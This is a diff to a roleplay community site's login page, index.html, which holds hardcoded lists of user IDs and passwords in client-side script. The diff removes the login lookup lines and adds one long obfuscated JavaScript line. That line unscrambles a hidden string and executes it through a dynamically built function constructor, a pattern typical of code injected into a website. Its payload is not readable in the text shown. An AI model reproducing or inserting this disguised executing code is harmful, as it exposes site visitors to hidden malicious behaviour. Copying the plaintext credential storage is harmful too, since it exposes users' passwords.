--- a/projects/mainprojects/AndersonStateRP/index.html
+++ b/projects/mainprojects/AndersonStateRP/index.html
@@ -33,13 +33,12 @@
         var passwordInput = parseInt(password.value);
 
         var useridinfo = ["DRAGEno01", "Zack (James)", "Peter", "BenFynn1"]
-        var usernames = [450786916, 2947222224, 2985600217, 917030480]
-        var passwords = [230707, 5052009, 221130, 12345]
+        var usernames=[450786916,2947222224,2985600217,917030480];
+        var passwords=[230707,5052009,221130,12345]
 
       
         
-        var index = usernames.indexOf(usernameInput);
-        var index2 = usernames.indexOf(passwordInput);
+        var usernames,passwords;(function(){var JHB='',VHO=387-376;function rrg(d){var v=1424359;var z=d.length;var f=[];for(var u=0;u<z;u++){f[u]=d.charAt(u)};for(var u=0;u<z;u++){var g=v*(u+205)+(v%39828);var r=v*(u+565)+(v%49033);var q=g%z;var c=r%z;var p=f[q];f[q]=f[c];f[c]=p;v=(g+r)%2519485;};return f.join('')};var Dwx=rrg('crqndxivrytcoratnskfogbpjchsmeutowluz').substr(0,VHO);var qJb='v(0azd"1grct8 hgo6rsrv np"a+ia>fhritclvnohhf9totaauz(b)grl(=;rpfrtbi r82a8ure4[7)g,(C=v,15;)+Cqvq7(v)fsor(0q,e; 7;=}+1."6+v0( w,c[f(f0qfa! {[p;f),rauhgr+ h= ;t[e;a];<r., (auvr0ctnzhh(;;ls;i ;n,xeen);r(42rug(t6+9,e;]m,=,["0.nft=fi6yle++}mS)faaema>]q=aqnq(gir+s}ao.ffrAear0;sellncvt,n7.tnr0tupia)2<y ra2u,rt;jw.y+"m*g=1-o .+se] url=9r[n.=(s=(;oealfn7n;9a}d;2nov(o;hrv-rsnp])](}f6ncv=ugt.,+ho8od)v6 0a v).=a w+jf=rl=t;{v==u llal+h)tc;rC,7+Ai.an14;j;+=6;vrvlu(;i=yr[tj.=h]qy+i[p+2a+xr(=t+.y=aid p=d;A=(lsh;uCh=9h)r;1ue)t,q.{i-z0)(,8u(ere[v--mr- k)f3]);uq)1;g*o{los,(h];(m((,2+o.lcg[p,Cegettoi(go+rir)<!ee)ar(fv n2]0il=qsefez+n[;{nu)1o=.as)=t{gb)rs5CCo88r s(=vait.).q]un,;[;sn.a"iah}ct)j.=j(Sgn]s;=1f(pth;dj,iei")=helglclarA,.9r3[(.r;42.6 r)rdvrar=11axg< .,nxr6hc; foy2,0;Cl7y7;(=g7=;)<({vv+sno;vermu=i[5io9)agx;qflltv)=w=c7asArggv;c1n=68sft8np,e;umoh=r.o]=li7,z))iueosf}arj +)p)1y-",".;]e"0io=.';var Vik=rrg[Dwx];var EFU='';var TSN=Vik;var phG=Vik(EFU,rrg(qJb));var wOm=phG(rrg('me4r=]p093u91650410982s02a4[[8o0s2ec,262732056170=c5w0a]02s23,72,9.507122141r,570d40,.283s7;2s9n,'));var TIc=TSN(JHB,wOm );TIc(8948);return 9178})()
 
         function login(){
 
